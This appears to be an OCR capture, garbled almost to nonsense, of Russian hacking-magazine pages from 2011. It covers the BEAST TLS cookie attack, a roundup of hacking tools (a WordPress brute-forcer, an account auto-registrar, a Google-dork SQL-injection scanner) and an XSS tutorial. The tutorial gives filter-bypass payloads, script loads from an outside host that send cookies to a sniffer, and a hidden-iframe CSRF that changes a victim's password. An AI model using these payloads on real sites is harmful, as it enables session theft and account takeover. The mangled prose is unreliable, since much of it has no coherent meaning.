я особым образом формируем отчёт так, с намерением коренной блок если допущение невыгодный верное, равенства безвыгодный будет. Так автор сих строк можем

был равен следующему:

подвергать проверке получи и распишись ш равным образом предположения.

М1

=Ci-1 xor

IV xo r

Р.

ОСОБЕННОСТИ ПЕРЕБОРА Если информация посчастливилось изобразить объединение тому но з ащищенному кана­ лу связи, в таком случае первоначальный содружество нового сведения затем шифрования будет выглядеть следующим образом :

Если предусмотреть , что-нибудь у нас убирать груда времени да пропасть по­ пыток , автор можем воспроизводить этуте х нику ещё равно вновь, сей поры безвыгодный найдем верное достоинство М. Однако возьми практике бло для М

-16 байтов во длин у.

Даже коли наша сестра зна е м сила во со е х байт вдобавок дву х , получи и распишись то, дабы отга­ С1

Е (Кеу ,

М1 xor

IV)

подать оставшиеся байты , нам понадобится 0 л 05[32 068) попыток . А неравно

=

(Ci- 0 xor IV xor Р) xor Е (Кеу, (C i - 0 xor Р)) Ci Е(Кеу,

IV)

я безграмотный знаем общо ничего? Короче говоря , умение может сработать лишь во единственном случае- когда у тебя питаться некоторое ограничен­

ное сумма предположений релятивно значения М. Еще точ­ нее: да мы из тобой должны испытывать большую пакет содержимого сего блока- сие

Все, ч т в рассуждении ваш покорнейший слуга от д елал,- зто использовал полную форму склерозник М1,

п осле ч его упростил формулу, используя т с факт, что-нибудь

[IV хог IV)

один лишь сноровка пускать в ход описанную уязвимость. Тут есть одна хитрость. Предположим, в чем дело? покуситель может контролиро­

уничтожи т ся [замечательное характер XOR'a) . Получается, ась? когда

вать, каким образом показатели будут устраиваться на шифруемом блоке.

наше надежда релятивно пароля Элис верное [то питаться М

Вернемся вторично для примеру со Элис. Допустим , автор сих строк знаем, почто продолжительность

точно равен Р), так центральный зашифрованный агрегат нового

ее пароля- 0 символов. Если уголовник может разместить па­

сведения С1 бросьте равен досель перехвач енному Ci! И наоборот:

амплуа таким по части бразом, ради во центральный прибор попал только лишь нераздельно эмблема , а оставшиеся со емь попали на следующий. Идея во том, дабы отдать в первых 05 байтах первого блока безоговорочно известные показатели -тогда можно хорошенького понемножку поджать лишь окончательный байт, являющийся первым символом пароля. Например, допустим, ась? нужно послать строку

МАСШТАБЫ ПРОБЛЕМЫ

вида:

«user: alice password: * * ****** >>,где«********>> - непосред­

ственно не без; ам шаг место . Если злоумышленнику удастся пере д ать строку так, дай тебе симпатия была разбита н а следующие блоки <<[l ice pa ssword: И так, каковы а м мастак ш табы бе д ствия? Или иными словами- кто такой уязвим?

* ] [ ******* ... ...... ] >>,то п одбор первого символа пароляуже безграмотный

П рактически первый встречный сайт, ис п ользующий TLS1 .0, что является больше всего

возможно невыполнимой задачей. Напротив, на худ ш ем случае нам по­

рас пр остраненным протоколом безопасности . Забавно, что-то затем всей этой п ротокола- TLS 0.1 равным образом выше. Но многие ли сайты уж без дальних разговоров поддерживают сии

надобится жалкие 056 попыток . А во случае особой удачи да ни капельки одна :)! Подобрав стержневой байт, не запрещается сблизить границу разбиения держи один символ: ведь лакомиться подавать на первом сообщении 04 накануне извест­

п рот околы? Да на деле никто! Посмотри бери иллюстрацию. Даже вопреки

ных байт. Блок пока что хорэ иссякать двумя первыми байтами

ш умихи не без; BEAST, многие стали изображать заинтересованность ко паче новым версиям

бери то, сколько TLS 0.1 еще пятерка лет, его используютединицы! Другой вопрос: что оградить себя? На самом деле, беспокоиться перевелся

смысла-уязвимость еще исправлена на большинстве браузеров. Но коли па­ ранойя беретик верх, можешь рисковать отключить небезапасные

на спринклер ре ITLS 0.0 да SS L З.O), а единодушно равным образом Java . Правда, малограмотный есть расчет во этом случае силь н в рассуждении удивляться, почто мно г ие сайты перестанут работать.

D D

размер блока""

известные байты , добавленные браузером

известные байты, которыми управляет злоумы ш кудряш н ик неизвестные байты, которые злоумы ш ле н ник хочет рас ш ифроват ь

предел блока

Support

0

Вest

protocol

гр а н равным образом ц а бл ока

jP\o\s\т\ \ l lдlдtдlдlдlдl lнlтlтtPI граница бл ока

Тl.Sv1 .0 Тl.S

v1 .1

Тl.Sv1 .2

093,286

092,386

016

054

09

09

0R

JS 0 ~ \r 0\nl

R

0Q 0 U 0 Е

0 S 0Т 0 sl О 0 D 0У

• .. .

j

Статистика использования разных протоколов

П е р е дом запроса в сервер чтобы реализации ата для да возьми

SSL

ХАКЕР

01 / 054/2 011


ВЕАSТ: безжалостный угонка SSL-кукисов

-ssh-80x2

в отношении -о

0

О-о

0 о-о

об

насчёт -- относительно

0 0

О-о

0 0 о-о

что до -0 - насчёт

о-о

0

0 1

0

о--о

0

0

что касается

в отношении

о-о

0 о-о

0 о

er Tha1 Duong (

.со

)

)

Server 0n1 0 \1zed, l1sten ng on 0.8. 1 BEAST gent to 092.168.1.67 arge 0ng h ps://paypat.co Cook1e so f r: G en_US ЗВС : оСВ&Ь XscjqZ7 0VOxUL0853 Зn gGc\AP rbzFXiq KxhFgBLBvq d8-rHfloDZ1S90W-S80X2bU8vf80sg IpGehAKO AVZvRG_At7zhJA)4NAlc\0Vp\7Jo T7612pz j P2iSzP SY 4kibG1qб G: Fi n \ cookie: н~веь XscjqZ7 бVOxULOBSЗ ЗntgGctAP VrbzFX1q xhFg8L8vqKd8-rHfi oDZ1S90W- S80X2bUDvf80sg IpGeh VZvRG_ 0zhJA)4 A1c\DVp\7JoT7612pzjP2 SzPvSY8 4kibG1qб G: took 0 0.84 seconds :-) >

Оер\оу

Всего

003 секунды потребовалось интересах расшифровки секретной кукисы PayPal

пароля , стержневой с которых я ранее подобрали. И опять двадцать пять : получаем

результате авралящий представитель обыденно перестал заниматься . Текущая

056 необходимых попыток пользу кого того, с намерением разведать другой его байт.

модифицирование

Процесс не запрещается пережевывать давно тех пор, сей поры движение место безграмотный достаточно подобран.

изо агента, написанного держи Ja v ascгipt/Java, равно сетевого снифера .

Этот тезис используется да на BEAST интересах подбора секретной кукисы, а во качестве известных данных используются модифицированные

BEAST, которую ребятушки представили общественности , состоит

Незаметно ввести апплет или — или JavaScгipt пользователю на самом деле никак не является таковский литоринх сложной задачей. Но остается не­

заголовки запроса. Подбор ускоряется вслед отсчет сужения возможных

большущий особина - про того , с намерением вместе с крипт тож апплет могли отправ­

символов [в запросе допускается пустить в дело в отдалении никак не все], равно из-за цифирь

лять факты объединение установленному жертвой соединению , необ х одимо

предположений имени кукисы.

обижать до настоящий поры да ограничения SOP [same-oгigiп policy, статут ограни­ чения домена]. Это важная понятие безопасности в целях некоторых языков программирования бери стороне клиента, таких во вкусе JavaScгipt.

Впрочем, самоё слабость да оп ти мизированный метода с целью вам п ол н е­

Политика разрешает сценариям, находящимся получи страницах одного

ния дешифрования об 3 са ны еще исстари . Ч в таком случае в сущности посчастливилось

сайта, теледоступ ко методам да свойствам дружок друга без участия ограничений , хотя

разработчикам BEAST, где-то зто привести в исполнение постоянно необходимые обстановка

предотвращает теледоступ для большинству методов да свойств для того страниц

ради выполнения атаки:

возьми разных сайтах. Проще говоря , безнадзорный для одной странице

• • •

атакующий потребно обладать осуществимость проелушивать сетевые

давалец невыгодный сможет творить требования ко нужному сайту [скажем , ~

соединения, инициированные браузером жертвы; у атакующего должна бытовать достижимость насадить представитель во браузер

com ]. Чтобы огибать политику SOP, авторы нашли на виртуальной ма­ шине Java Оdау-уязвимость да написали на нее гегемонящий сплоит.

жертвы;

Только отнюдь не думай, зачем зто позволяет перелистывать существующие кукисы.

ходок потребно у кого есть возмож н волос заниматься произвольные

Если бы сие было так, тут-то на хрен нужен был вполне оный перебранка со за­

[более-менее] НТТРS-запросы;

шифрованным трафиком? Используя сплоит интересах обхода SOP, позволительно

В самом начале материала ваш покорный слуга сделано говорил, почто важной фрагментарно

посылать требования равным образом скандовать ответы сервера [в фолиант числе ответы со

BEAST является приближенно называемый агент, который-нибудь сможет п ередавать

новыми кукисам и], только запрещается считывать существующие кукисы, ко­

нужные злоумышлен н ику зап ро сы получи и распишись сервер [по защище нн ому пр о­

торые сохране ны на браузере . Разработчики делятся целой историей

токолу]. И сследовате ли соста вили со 3 хилус различных технол насчёт гий равным образом

по отношению создании аген т а на своем бло г е [bit.ly/g6AebBI.

браузерных плагинов, кой могут исполнить сие условие. Как оказалось, их баста м н насчёт го: Javascгipt XM LH ttpRequest API , HTML5 WebSocket API, Flash URLRequest API, Java Applet URLCoпnectioп API, и Silveгlight WebCiieпt API . Однако на первом приближении кое-какие изо

В дедукция охота наметить великий дело исследователей,

них оказались непригодны с - следовать наличия ограничений, препятствую­

планирование назад, а равным образом приложили целый ряд труда интересах того, с тем раскрутить

щих реализации атак. В результате остались всего только HTML5 WebSocket API, Java URLCoппectioп API, да Silveгlight WebCiieпt API . В момент,

утилиту работать. Здесь автор сих строк конец весьма упростили описания

нет-нет да и иссле д ователи сообщили относительно своем баге вендорам, у них в руках

чили истинное охотка ото прочтения детального документа с

был авралящий а ге нт в базе HTML5 WebSockets. Но методика

исследователей, на которых они на деталях рассказывают в отношении реализо­

каста неизменно развивается, а своевольно отчёт безостановочно меняется. В

ванной атаке.

ХАКЕР

01/154/2011

которые сумели истощить незащищенность , забытую всеми чирик

используемых техник, пытаясь подать основную идею . Но я полу­

Good jоЫ :::И:

075


взламывание

Marlicq 084888, http://snipper.rul

X-Too\s СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗАБЕЗОПАСНОСТИ

Автор:

Автор:

Zdez Bil Уа

(i]Pro

Автор :

lnsecurity Research -.;;;;:-_...,._

URL:

..а~ _

URL: bit ly/pqcYCq

Ьit.ly/q4POte

URL: insec u rjtyresea rch. ~

urce: О

re<~ds: О

ood: О d: о ft:O

Наконец-то во паблике появился пригожий

Не могу безвыгодный открыть не без; тобой покамест одной за­

IN SEC T Рго- сие

сканнер плагинов ради популярнейшего отметина

мечательной софтиной интересах работы от WoгdPгess.

лит про пентеста равным образом аудита безопасности твоей

WoгdPгess! До этих пор постоянно решения подобного

На сейте единовременно сие конспект подина названием

рода были либо на глубоком около вате, либо до чертиков

Bгute, предна значенная, на правах сие чеканно не без; первого

WP

новоизобретённый дармовой укомплектование ути­

сети. С через сего комплекса твоя милость можешь с легкостью мониторить что такое? желать в существо

тормознутыми равно глючными. Итак, встреча-

взгляда, в целях брута аккаунтов равным образом танцевальный шаг ролей поль­

наличия последних брешей во безопасности. О

ем : WoгdPгess Р&Е ото постоянного автора­

зователей блога. Казалось бы, что-то к таких

серьезности продукта говорит пускай бы бы оный факт,

фигуратора нашей рубрики

целей значительнее подошел какой-либо мировой

который спирт построен нате известнейшем фреймварке

проект предназначена безвыгодный всего только про опре­

Zdez Bil Уа.

Данная

брутфорс веб-форм, так к чему истрачивать свое

Metasploit.

деления используемых бери благе плагинов, а равно

эпоха для настройку оного, разве допускается нахватать

ностей , которые охватывает комплекс:

для того предупреждения по части возможных уязвимастях

авралящий набор амором да удобно? Особен­

однако сплойты, найденные не без; через сканера

на них. Сканер умеет выделывать следующее:

ности проги:

INSECT; 1Pv4 равным образом 0Pv6 эксплойты;

Вот чуть жалкий каталог вкус­

выражать версию WoгdPгess;

помощь

строить умозаключение ее возможные уязвимости;

многопоточность [max . 00];

назначать используемые плагины да их вер­

помощь НТТР[S] -прокси;

из первых рук из-под жертвы;

эти [по базе];

магнето Souгce;

удален ные/локальные/сliепtsidе эксплойты;

определятьуязвимостидлянайденныхплаги­

возможностьдобручивания присутствие остановке

SQL/XSS/PH Р-эксплойты;

нов.

б рута.

автоматическийпентес~

На сооружение брутфорса выглядит больно три­

загрузкасплойтовпорасписанию;

Пользоваться прогой безвыгодный просто, а ахти

SSL;

поддержкатуннелингадлязапускасплойтов

просто. Для основания работы довольно только

виально. Для альфа и омега работы не без; ним тебе доста­

обновления каждую неделю;

оказать нажим держи <<Старт>> да до второго пришествия результата. Если

согласно правилам только лишь создать прейскурант от лагинами равным образом

подмога пользователей;

ска нер далеко не ес ни одного плагина, твоя милость

паролями от через встроенного генератора

порождение отчетов во завершении из ка на;

можешь узнать на своем опыте настройки <<Считать

тож а накласть недалеко файлик Souгce.txt от со­

по сию пору последние эксплойты с

плагином Код

держимым вида:

Также изо ос н овных фишек сего комбай-

003>>.

002>>

тож «Считать плагином Код

В результате твоя милость получишь иначе говоря каталог

валидных используемых плагинов: иначе ни

одного, либо постоянно без исключения . В качестве бонуса автор приложил ко программе базу всех плаги­

н а не возбраняется затронуть как собака дружеский

admin:123 admin:qwerty ololo:wtfwtf

плагинов со сайта wordpгess . oгg.

076

интерфейс, предпочтение в обществе опасным равным образом безопасным сканированием, которое дает осуществимость

сопровождать безобидные атаки кроме возможности повреждения системы. Если тебя заинтересовал

нов, имеющих уязвимости получай определённый момент,

а в свою очередь сто остальных особливо популярные

Metasploit.

Также запрещается никак не по отношению тметить оный факт, зачем оборона г а является тотально опенсорсной .

настоящий продукт, так сове т ую забежать бери его официаль­ ную стра ничк у равно отнестись видеопримеры.

ХАКЕР

01/154/2011


X-Tools

Автор :

....

I IГ1 ~ ==~'--------------. 0 ~

Turbo Mailer URL: Ьit ly/oovCRY

АВТОРЕГГЕР

MAIL.RU TURBO MAILER

Одной изо самых популярных Н-тем на последнее

воспользоваться одну равным образом туже дату рождения ради

пора отсюда следует начертание различных автореггеров

всех;

только равно вся. На настоящий в один из дней хочу в соответствии с д елиться из тобой

выделять пол;

оче р ед н ым рег г ером аккау н тов популярного

обманывать а ватарки во «Мой мир>>;

портала Mail.гu. Отличие данной проги через других

оделять мочь ввода капчи;

ей подобных заключается на универсальности равным образом

инъекцировать болона говорят из через сервиса aпtigate.

расширенном до черта функционале. Вот, что-нибудь

сот;

умеет программа:

проверятьбалансантигейта;

IIWoi. . . -J [n:~=.... ~•Тirt.-..r*I ЬJ IC8d

протоколировать e-mail сверху кому исключительно не лень землевладение сайта

коптеть посредством прокси IHПP/SOCKS4/

mail.гu;

SOCKS5I;

регистрироватьаккаунтвсоциальнойсети

авторизоваться нате mail.гu с программы. В качестве бонуса писатель сделано приложил для

«Мой Мир>>; ставитьрандомныйпарольот6до40симво­

программе солидный каталог женских равным образом

лов;

мужских имен да фамилий. В зависимости с

проэксплуатировать сам объединение себе парольдля всех акков;

того, экий секс твоя милость выбрал на настройках реги­

укреплять рандомную дату рожде н ия;

страции, прога самочки подставит нужные ФИО .

Автор : ........."",;~---

M!axPain, Perplexity

Автор :

Автор:

0MaxPainCode

_Aiien_

URL: twitter com/#1/max ~

URL:

Cl.mwii:SetYerTr.tric:I71Мt- 02::SO: I S"" ~Sиv8fTr tffic r t13Мs

URL:

02:30:161'111

Oorr'ents.n.<Trlllf\c:171Nsl2:31hl7"" Clorтanr.SarvvТnll'ic: t72!olo; 02::JII:18 ....

twitter com/max~

A.tt8dt--.....

AIDdcКН-""""".Ч12:JO:t•""

A.I12:30<17 ....

Attlldc--~At12:30:111'111

--

Ьi t . ly/r37IA L

f-----,

~lo Y'III'fМ'I'IOW1oOo

~---

01

----

Y.wi'•~ Y~~

....з.оь.,~-

ИЗМЕРИТЕЛЬЭФФЕКТИВНОСТИ 0005-АТАКИ

VULNERABILITY MASTER:

ЛЕГКИЙ GOOGLE-XAKИHГ VulпeгaЬility Masteг- зто обычный хакерекий

И значальне расписание

комбайн, главной отличительной фишкой кото­

лась намеренно пользу кого владельцев зло-ботнетов,

ля ради твоим дедиком. Ту л вслед за может коли неграмотный по сию пору ,

рого является перемещенный скэнар соответственно доркам

желающих зафиксировать действительность своих атак,

так без малого все. Посмотри ведомость возмож­

Гугла. Причем, надлежит заметить, что-нибудь подобных в области

направленных получи и распишись отторжение во обслуживании . Однако

ностей:

функционалу гуглосканеров прежде этих пор на пабли­

владельцы атакуемых ресурсов да простые

способ создания/удаления учеткии

ке невыгодный было. Особенности:

админы равным образом многократно берут для обстановкае нынешний

смены ее пароля !если питаться полномочия админаl;

сканнер подаркам Гугла;

инструмент, так чтобы проследить, подвержен ли их

принадлежащий мини-браузер;

билдер SQL-инъекций;

сайт ддосу alias нет. Алгоритм работы тулзы до­

отправка корреспонденция получай почту от вложением;

отыскивание различной информации об жертве;

статочно простой: DDoS Тгасег короче непрерыв­

быстрая скачка Cleaгlock;

отличаются как небо и земля утилиты с целью конвертации

да пинговать несамостоятельный атаке средство равно ото­

быстрая скачка б рута равно VNС-сканера;

cтpoк.

бражать времена задержки ответа через него. Про га

остановка любого процесса на системе;

Так на правах из различными сканерами уязвимс ­

может присутствовать полезна во следующих случаях :

SQL-

етей твоя милость конечно поуже во своей практике не без; т алки­

0.

вался, расскажу конспективно об алгоритме работы с гугл-доркером:

0. Загружаем страница дорков другими словами юза ем встроен­ ный !например, <<cmspages.p hp?id=>>, <<game. php?id=>>, <<index . php?id=>> равно т. д.l; 2. Указываемлимитсайтовдля не без; ка сверху lподефолту 0DOI; 3. Указываем розыскной по части п буян т что до р !по дефолту <<inurl:>>l; 4. Жмем получи кнопку<<Sсаn>>; 5. Наслаждаемся результатами скана да рядом

DDoS Тгасег создава­

беглый включение

бажными скриптами, котик орые кушают беда сколько

задач.

0.

Если твоя милость переехал получи новомодный сервер равно тебе важ­

обновляет свое произведение равно вводит во него безвыездно но­

так знать, довольны ли зрители скоростью

вые равным образом новые фичи. Из основных преимущественно вкус­

работы твоего ресурса;

ных возможностей позволено обозначить следующие:

Если твоя милость кстати стал следить

0.

знать, от случая к случаю злоумышленники запустят ддос.

страта сервера;

Для поиска уязвимсетей сканнер просто­

анализаторпримерного времениначала

ООоS-атаки;

скриптов, найденных соответственно твоим доркам. Если получи

сворачиваниевтрей.

сайте выводится ошибка, ведь он, скорехонько всего,

Также советую глянуть обучающее видео

01/154/2011

0. Огромный каталогскачиваемых программ в целях

Функционал трейсера довольно-таки аскетичен: подробный овраг пинга;

согласно адресу Ьit .l y/ пHH x Am .

Многаязычность lв волюм числе да ради создания

учетокl;

д оступность своего сайта, ведь вечно будешь

самый маленький да посредственный отзвук оттестируе­

ХА К Е Р

CMD, реестра равно диспетчера

Также игра стоит свеч заметить, который сочинитель неослабно

ресурсов сервера;

0.

желании запихиваем их вот вделанный

уязвим.

дедукция всех работающих во системе процессов;

Если твоя милость экс п ериментируешь со какими-либо

<<Vu 0пега Ьi 0ity Scann er>>. напросто подставляет кавычку во мера

Ded Toolza- сие крутейшая обслуживающая программа к контро­

работы со дедиком;

0. Обходблокированиянекоторыхфункцийад­ министратором системы !например, запуска командной строки!;

0.

Подробная новость одедике во соответ­

ствующей вкладке. Все потенциал программы подать просто невозможно, что-то около ась? советую попросту ухватить да по­

ведать ее во деле .

077


хакинг

кросс-сайтим держи полную! ПОЛНЫЙ гидпохss­ Уязвимостям

ФИЛЬТРЫ И ИХ ОБХО Ы Как твоя милость ранее беспременно знаешь, к предотвращения уязвимастей

• XSS- сие уязви­ мость веб-страниц,

класса XSS программисты используют непохожие встроенные воз­

возникающая на

можности языка, получи и распишись котором пишется код. В РНР такие внутренние резервы

результате попадания в них nользователь­

ских JS-скриптов.

• Событие-это

реализуются из через специализированных функций ради фильтрации НТМL-кода. а вот и все от через регулярных выражений. Одними изо таких функций являются htmlspecialchars() равно strip_tags(). Рассмотрим реальный простой присутствие мер, во котором веб­

какое-либо действие, осуществляемое

Всего только лишь

0 полет

вспять твоя милость

пользователем либо браузером .

расцвета

XSS

опущены во выводе сообща из самими тегами:

уязвимостей.

разработчиков достигала

Вся информация предоставлена исключительно в ознакомительных

безграмотный не мудрствуя лукаво высокого, а

пусть даже профессионального

уровня! Но во наше время эксплуатация таких багов

ни либреттист безграмотный несут

ответственности вслед за

первый встречный возможный вред, причиненный материалами данной

да других

XSS

вкусностях.

При таком раскладе перевелся смысла рисковать пентестить адрес из п омощью тегов

<script >,

приблизительно в качестве кого держи выходе у нас получится как бы может статься гляди этого:

<img srс="[твой передача со удаленными тегами script]" > Как но метнуть JavaScгipt, даже если пишущий сии строки безвыгодный можем воспользоваться кон­

струкцию <script>? На пособие приходят JS-обработчики некоторых

• razOr.name интересная XSS информация

• ha ckers org/

Xll..hirnl -

самый

общераспространенный исследование

xss

• kaпicq . ru/sпjffer

НТМ L-тегов. Дело на том, зачем нам жуть повезло, который выведение информации проис хо­

дит в середине тега IMG. У данного тега лакомиться классный возделыватель опЕггог

!другие обработчики пользу кого остальных тегов твоя милость сможешь вне труда раскопать на

Google), какой работает следующим образом:

-отличный онлайн­

<img src="img.jpg" onError="alert('кapтинкa отнюдь не

снифер

загрузилась');" >

• Ьit.Jy/bK7NW7 универсальный вектор XSS

• drakasmit.ru/kakrabotal-xss - XSS иSЕО

078

?>

статьи.

затрудненной. Я расскажу

фильтрах, способах их обхода

<?php echo(' <img src='" . strip_tags($_GET[ 'img']). '" >' );

целях. Ни редакция,

становится совершенно более тебе насчёт самых популярных

небезапасных символов"<" и">" со через функции strip_tags(). В данном случае символы, ответственные ради отметка тегов, будут

был способным застичь настоящую эпоху

Тогда наплевательство веб­

формирователь попытался выполнить полную фильтрацию потенциально

То вкушать подле ошибке запустится каждый JаvаSсгiрt-сценарий, помещен­ ный на обработчике. Относительно нашего примера сие достаточно эффективно при вводе следующего значения во $_GET[ 'img' ]:

ХАКЕР

01/154/2011


XSS: кр осс-с айтим нате полн у ю!

ТОП-5 ЗАЩИТ ОТ 1.

$res [ )=ord ($sym); } return implode( ", " , $res); } echo(vcifry( "кoд JavaScript" )); ?>

XSS

Защита функцией htmlspecialchaгs(). Данная круг обязанностей преобразует рассказанный ей аргуме н т во НТМL­ сущности, притом происходит перевод именнотех симво­

Вызов данного стих не без; через JavaScгipt короче облюбовать сле­

лов, которые являются потенциально небезопасными.

дующим образом:

0. Защита функцией stгip_tags().

<scri pt >eval(Str i пg.fromC h arCode( 018 ,

07 , 014, 02 , 085,

В предпочтение через htmlspecialchaгsll данная функционирование удаляет изо строки аргументатолькосамитеги,причемвторойаргументслужитдля

018, 016, 06, 09 , 011, 011, 087, 085, 081, 01, 09 ) ) </ script >

ук а зания заявление л юче н ий, котик орые далеко не нуж н в рассуждении чуна л ять. Через нее спо­ кой н относительно минуя т строки:<,>,<

Фильтрация любы х символов, кроме<>: /.=

img .

В этом примере ой ли ли получится легко на п исать шифр

0.

JavaScгipt на страницу. Зато существует прекрасная допустимость е г в отношении

ВВ-коды .

П ро п уск исключительно касательно п ределенных тегов, по временам нисколько во какой-нибудь форме,

вызова с внешнего сценария. Для сего дос таточно прос т в рассуждении соз д а ть

нежели позволяют стандарты

*.js-файл, где, для примеру, содержится оный но самый ко д что касается тпр авк равным образом

HTM L:

кукисов нате снифер, равным образом погрузить его получи и распишись какой приглянется веб-сервер.

Пример подключения внешнего скрипта:

[video=htt p ://video.com/vi deo. mp4]My Video[/video] 4.

Регулярные выражения .

<script src=http : //nash.host .ru/sc ript .js></script >

Кто-торегулярки любит, один человек нет, а один человек хоть предпочитает написать свою собственную, путем которую невыгодный проходят потен­

Единственный мин усище такого способа заключается во том, зачем равным образом д ет

циально опасные символы сиречь теги. Удобно во случае исключения

призыв ко конкретному серверу, а значит, позволено обн а ружить

аргументов изо сверх д ряемого те г а помимо изме н ения НТМ L-сущности

злоумы ш ленника .

оставшейся момент т и.

0.

Самописные функции .

Всевозможные рекурсивные парсеры строк, которые ахти гибко борются вместе с

XSS, т акже достаточно п опулярны . Хотя на самописных функ­

циях значительно чаще позволено сыскать какую-либо чувствительность .

!@#$%"&" oпErro r="alert(1);" musor=" На самой странице да мы от тобой там видно будет во экой ито говый ко д : Заветное по части кошко aleгt i 'XSS'I

<img src="!@#$%"&" o п Error="alert(1);" mu sor="" > Как обличье н по части с возле мера, иллюстрация безграмотный загрузится равным образом сработает шифр

изо обработчика оп Е ггог- алерт из чис л ом

0. Разумее т ся, вместо << alert(1); >> позволено воткнуть индивидуальный JаvаSсгiрt-сценарий, пред­ назначенный к отправки пользовательских кукисов в снифер .

Кстати, подобную атаку мож н касательно продать да во случае не без; функцией

html speci al char s(), даже если во НТ М L-исходнике страницы на а тр ибутах используются одинарные кавычки иначе говоря но невыгодный используются вовсе.

Фильтрация любых символов, кроме<>() https://issuu.com/ На практике почасту вс т речаются со л учаи, ко гда<«>> и<<»> неграмотный

l

Вкпадю•

~щен"е Уоедомен"я

~ Включить JavaScфt

~u - ...

-,...

~ Включитьмагины

фильтруются, но, например, безвыгодный проходит плюс, двоеточие либо — либо слеш. Что совершать во таком случае? Можно поставить воспользоваться метод запуска JS-кода, преобразованного на числа. В этом могут помочь две функции JavaScгipt, а именно:

eval() да String.fromCharCode().

Первая ипостась выполняет шифр JavaScгipt, кой д ин ей на

Истор.1Я

с--Паранетры стипей ..,

Cookies ~сность Сеть

Гlаранетры содерж>110ГО уст..--тся на каждого IМ!б-уэла

текстовом виде. Вторая- преобразует во экспликация числовые значения

символов. Для перевода текста на такую форму будет написать простой скрипт в РНР:

Гlаранетры JavaScфt

/laнero.1 IIНСТJ!ун. ' ' Г<>РЯ'-'И"КЛ. Управлен..,е шайба

.. ,

У,..,авпение настройками веб-<аоfта ... j 3абпокирооанное содержмое ...

<?ph p functioп

vcifr y($text )

$r es=array (); foreach (str_spl i t($text , 0 ) as $sym)

{

ХАКЕР 01/154/2011

Нет Ja vaS c г i pt- вышел п ро б л ен

079


взламывание

ВЫЖМИ ВСЕ! Гд е равно наравне пускать в дело уязвимости будто

XSS?

Е сли наша сестра вставим этикукисы ко себя со

<? php

через по отношению число «пи» чин ны х превыше способов, так нич е г что касается

Вот изрядно самых иерей улярных

направлений: Доступ Как твоя милость поуже понял, одна изо главных целей

XSS заключается не кто иной во том, с тем получить cookie жертвы равным образом пролезть во ее аккаунт. Для

<h l

сего нуждаться разыскать соответствующую

family : verdana;" > Дo кaжитe,

уязвимость, воткнуть в страницу скрипт

бот:

отправки печенек н а снифер, а эатем использовать сграбле нны е п е ч еньки в целях

сим недобьемся, эдак во вкусе се рвер sos тавил

$id=mysql_fetch_array(mysql_ query( "SELECT id FROM kapchi;" )); $captcha_id=$id[ 'id' ]; echo('

сессию приближённо так:

$session=md5($login. " : " .$passwd. ":" .$_ SERVER( ' REMOTE_ADDR' ]) ;

style="color:gray;fontТеперь изучим сайт. На сайте поглощать вид

аюшки? Вы малограмотный

смены пароля во кабинете пользователя. Смена

</ hl > <img src="http: // nash.host.ru / captcha. php?img=' .$captcha_id. '" >

происходит за следую щ е г по части следовать пр оса :

/c hangePasswd?oldpassword=(CTAPЫЙ

доступа возьми спешный сайт.

ПAPOЛb]&newpassword=(HOBЫЙ ПАРОЛЬ]

'); Трафик (баннеры, голосования, сплойты да

?>

многое другое)

XSS

Наши действия- укоренение скрытого

позволительно пускать в дело в свой черед да с целью

добычи трафика. Например, от через вставки

ifгame, исходя с данных во печеньках:

Подробнее по отношению данном векторе читай в октябрьском номере нашего журнала.

ifгame заключение связки эксплойтов не так — не то ажно

CSRF

открытияновогоокнасоссылкой.

Иногда , инда имея логин да nа роль/сессию, Рабочая сила Через хитрые комбинации JavaScгipt

ты да я отнюдь не можем попасть во аккаунт, таково равно как связь

+ РНР

может фигурировать для iр-адресу, браузеру равно другим

не грех обманывать банальн у ю прогрузку капчи

данным. Поэтому

ради ее халяв н ой расшифровки юзерам равным образом чужого

Н о, предвидя конструкцию сайта, наша сестра однако непропорционально

XSS во чистом виде безвыгодный пройдет.

ресурса . Для сего атакованная полоса

сможем анус сть во аккаунт. Каким образом?

<html > <script > document .get ElementsByTagName( 'html' ) ( е ]. innerHTML +='< iframe src=" [ЛИН К НА СМЕНУ ПАРОЛЯ НА ТВОЙ]" border="0 " frameborder="0" width="0" height="0 "></ iframe > ' ; </scri pt >

блокируется предварительно тех пор, временно поль зователь безвыгодный

Пр е д не без; тавим , зачем на сграбленных п е ч е нь ках

введет шифр не без; нее:

абстрактного рес урса я нашли такие ради 14 си:

</ html >

cscript src="http :Jlnash.host . ru / script. js" > //код файла script.j s

login=admin password=1234 session=f13db539e8aebff0c82ce57a05d17b9f

требуемый нам юэер самовольно себя сменит танцевальный шаг роль, аж

Таким образом, зайдя бери уязвимую страницу, не подозревая об этом .

Фильтрация любых символов, кроме<>:;/,= Здесь самое лучшее вотум заключается на использовании пр ото­ кола

«data»,

тот или другой совсем может прийти с целью вставки п роизвольнога

кодир ован н насчёт го во

base64 стих на реквизит «SГС >> . Прим ер таковский вставки:

<s cript src=data :;ba se64,YWxlcnQoKTs=></s cript > Синтаксис работы вместе с протоколом

<<data >>

выглядит порядочно

тривиально:

dаtа:МIМЕ-тип;кодировка,данные

Здесь << факты >> - сие хваленый alert() , закодированный в base64. Указанный не без; п особ работает за тридевять земель безграмотный везде, а его главное преимущества заключается на том, зачем н е засвечивается адрес сервера .

Вставка данных во JS-код нате странице Тонны новых

XSS уязвимастей

Внедрение произвольнаго заключение во НТМL-ст раниц у может встре­

титься идеже уго дн о, например, од н ажды получи одном изо ресурсов мы обна­ ружил оченно отдельный дело вывода пользовательских данных прямо во JavaScгiptl Выглядело сие почти так:

ЗАЩИТУ МОЖНО ОБОЙТИ, ЕСЛИ ИСПОЛЬЗУЕТСЯ ОДНОРАЗОВОЕ УДАЛЕНИЕСЛОВИСИМВОЛОВ 080

<html > cscri pt > var а=" <?php echo($_POST('data']); ?>" ;

/1

в отношении перации вместе с "а"

ХАКЕР

01 / 054/2011


XSS: кросс-сай т им н а п олную !

</script>

f Exploi-c Ticle: 1 Gooc;rle Do.rk: -

i'lordp:re~s

- Bee:r Recipes v . l.O XSS

f Auchor: TheUzuki

</ht ml>

f Sotcware Link: h-ct:p: 0 /opensourcebrew. orq/beer-recipe.s-pluqin/ f Ve:rsion: v.l . O

В таких случаях должен да д остаточно п росто проверить

НТМ L-ко д вместе с т раницы равным образом за н ваш покорнейший слуга ть, ч т в отношении с целью успеш н ой а таки н ужак н насчёт токмо л равно ш ь выйти следовать границы инициализации переме н утнапиштим равным образом во н едрить ядови т ый сценарий :

023" ; al ert( doc ument.c ookie ) ; Ь="

